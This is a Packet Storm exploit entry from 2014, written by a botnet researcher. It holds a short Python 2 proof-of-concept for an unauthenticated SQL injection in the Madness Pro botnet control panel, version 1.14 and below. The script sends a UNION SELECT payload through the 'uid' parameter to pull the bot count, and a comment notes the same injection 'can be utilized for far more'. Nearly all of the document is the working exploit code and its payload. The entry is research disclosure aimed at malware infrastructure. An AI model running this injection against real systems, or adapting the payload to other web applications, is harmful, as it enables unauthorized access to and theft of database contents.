Madness Pro 1.14 SQL Injection

2014-06-06T00:00:00
ID PACKETSTORM:126974
Type packetstorm
Reporter bwall
Modified 2014-06-06T00:00:00

Description

                                        
                                            `#!/usr/bin/env python2  
# -*- coding: utf-8 -*-  
# Exploit Title: Madness Pro <= 1.14 SQL injection  
# Date: June 05, 2014  
# Exploit Author: @botnet_hunter  
# Version: 1.14  
# Tested on: Apache2 - Ubuntu - MySQL  
# ▄▄▌ ▄▄▄▄· ▄▄▄▄▄ • ▌ ▄ ·. ▄· ▄▌  
# ██• ▪ ▐█ ▀█▪▪ •██ ▪ ·██ ▐███▪▐█▪██▌  
# ██▪ ▄█▀▄ ▐█▀▀█▄ ▄█▀▄ ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▐█▌▐█▪  
# ▐█▌▐▌▐█▌.▐▌██▄▪▐█▐█▌.▐▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌ ▐█▀·.  
# .▀▀▀ ▀█▄▀▪·▀▀▀▀ ▀█▄▀▪ ▀▀▀ ▀█▄▀▪▀▀ █▪▀▀▀ ▀ •  
# ▄▄· ▄• ▄▌▄▄▄ ▪ ▐ ▄ ▄▄ • • ▌ ▄ ·. ▄▄▄· ·▄▄▄▄ ▐ ▄ ▄▄▄ ..▄▄ · .▄▄ ·  
# ▐█ ▌▪█▪██▌▀▄ █·██ •█▌▐█▐█ ▀ ▪ ·██ ▐███▪▐█ ▀█ ██▪ ██ •█▌▐█▀▄.▀·▐█ ▀. ▐█ ▀.  
# ██ ▄▄█▌▐█▌▐▀▀▄ ▐█·▐█▐▐▌▄█ ▀█▄ ▐█ ▌▐▌▐█·▄█▀▀█ ▐█· ▐█▌▐█▐▐▌▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄  
# ▐███▌▐█▄█▌▐█•█▌▐█▌██▐█▌▐█▄▪▐█ ██ ██▌▐█▌▐█ ▪▐▌██. ██ ██▐█▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█  
# ·▀▀▀ ▀▀▀ .▀ ▀▀▀▀▀▀ █▪·▀▀▀▀ ▀▀ █▪▀▀▀ ▀ ▀ ▀▀▀▀▀• ▀▀ █▪ ▀▀▀ ▀▀▀▀ ▀▀▀▀  
#  
# Unauthenticated SQL injection in Madness Pro panel <= 1.14  
# Proof of Concept retrieves a count of the bots, although it can be utilized for far more  
# Discovered and developed by bwall @botnet_hunter  
#  
# References:  
# http://blog.cylance.com/a-study-in-bots-lobotomy  
#   
import urllib  
  
# Fill in URL that Madness Pro bot connects back to  
panel_url = ""  
  
  
def run_sqli_proof_of_concept(panel_index_url):  
f = urllib.urlopen("{0}?uid='%20OR%201=2%20UNION%20ALL%20SELECT%201,1,1,CONCAT('bot-count:',COUNT(*))%20FROM%20bots"  
"%20--%20--".format(panel_index_url))  
print f.read()  
  
run_sqli_proof_of_concept(panel_url)  
`